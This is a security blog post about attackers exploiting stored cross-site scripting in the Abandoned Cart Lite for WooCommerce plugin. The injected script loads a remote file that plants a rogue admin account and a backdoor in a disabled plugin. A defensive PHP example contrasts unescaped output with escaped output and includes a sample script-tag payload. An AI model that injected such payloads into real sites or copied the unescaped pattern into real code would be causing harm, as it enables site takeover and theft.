Hackers are way ahead in finding loopholes in frameworks like WordPress.
There are hundreds and thousands of plugins used within WordPress, paid and free.
Finding the vulnerabilities within these plugins is very difficult. Hackers know this and outpace the agencies (Wordfence) that keep an eye on such vulnerable plugins.
Recently (12-03-2019) one such vulnerability was traced to a WordPress plugin that lets the website owner know which users left the site after adding a product to the cart without buying it. Detailed Article here
The way the hackers gain entry is rarely spotted and seems to be a new method of attacking WordPress-based sites.
The hackers are exploiting a cross-site scripting (XSS) vulnerability in the abandoned cart plugin.
The mode of operation
The hackers abuse this abandoned cart functionality by adding code to the harmless-looking fields of the shopping cart.
Because of how the plugin works, this code is saved to the database so that it can be fetched for the admin in the backend.
Whenever the admin opens the backend admin panel to check the abandoned carts, the code is executed and calls a remote JavaScript file.
This script installs 2 backdoors on the site.
One of the backdoors creates an admin account, and the other searches for the last disabled plugin and replaces that plugin's code with malicious code.
A disabled plugin is still accessible to the hackers; this is their contingency plan.
If the admin deletes the admin user they created, they can still access the site through the second backdoor.
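The pattern described above, as an added example rather than the plugin's actual code: a stored cart field echoed into the admin page without escaping, next to the escaped form and a simple check for stored rows that contain markup. The field names, function names and sample row are assumptions made for illustration.

```php
<?php
// Added illustration; not the plugin's code. All names here are hypothetical.

// Constructed sample row, as guest checkout fields might be stored in the database.
$cart = [
    'billing_first_name' => 'Ann<script src="https://example.invalid/x.js"></script>',
    'billing_email'      => 'ann@example.com',
];

// Vulnerable pattern: the stored value is echoed into the admin page as-is,
// so the logged-in admin's browser parses it as markup.
function render_row_unsafe(array $cart): string {
    return '<tr><td>' . $cart['billing_first_name'] . '</td><td>'
         . $cart['billing_email'] . '</td></tr>';
}

// Hardened pattern: encode on output so the value is displayed as text.
// Inside WordPress, esc_html() does this job.
function e(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $cart): string {
    return '<tr><td>' . e($cart['billing_first_name']) . '</td><td>'
         . e($cart['billing_email']) . '</td></tr>';
}

// Defence in depth on input: strip tags and control characters before saving.
// Inside WordPress, sanitize_text_field() and sanitize_email() cover this.
function clean_on_input(string $v): string {
    $v = strip_tags($v);
    return trim((string) preg_replace('/[\x00-\x1F\x7F]/u', '', $v));
}

// Audit helper: list the fields of a stored row that contain markup.
function suspicious_fields(array $cart): array {
    return array_keys(array_filter($cart, fn($v) => $v !== strip_tags($v)));
}

echo render_row_unsafe($cart), "\n";   // script tag reaches the page intact
echo render_row_safe($cart), "\n";     // script tag is shown as &lt;script ...
echo clean_on_input($cart['billing_first_name']), "\n";
print_r(suspicious_fields($cart));
```

Running the audit helper over existing abandoned-cart rows shows whether markup was already stored before the plugin was disabled or updated.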
We recommend not using this plugin until the developer of the plugin has released fixes.
Abandoned Cart Lite for WooCommerce
At Veblogy we keep an eye on such vulnerabilities so that your site and your users remain safe from hacking attempts.
Make your site a safe place for your users. Fill out the form below for more details.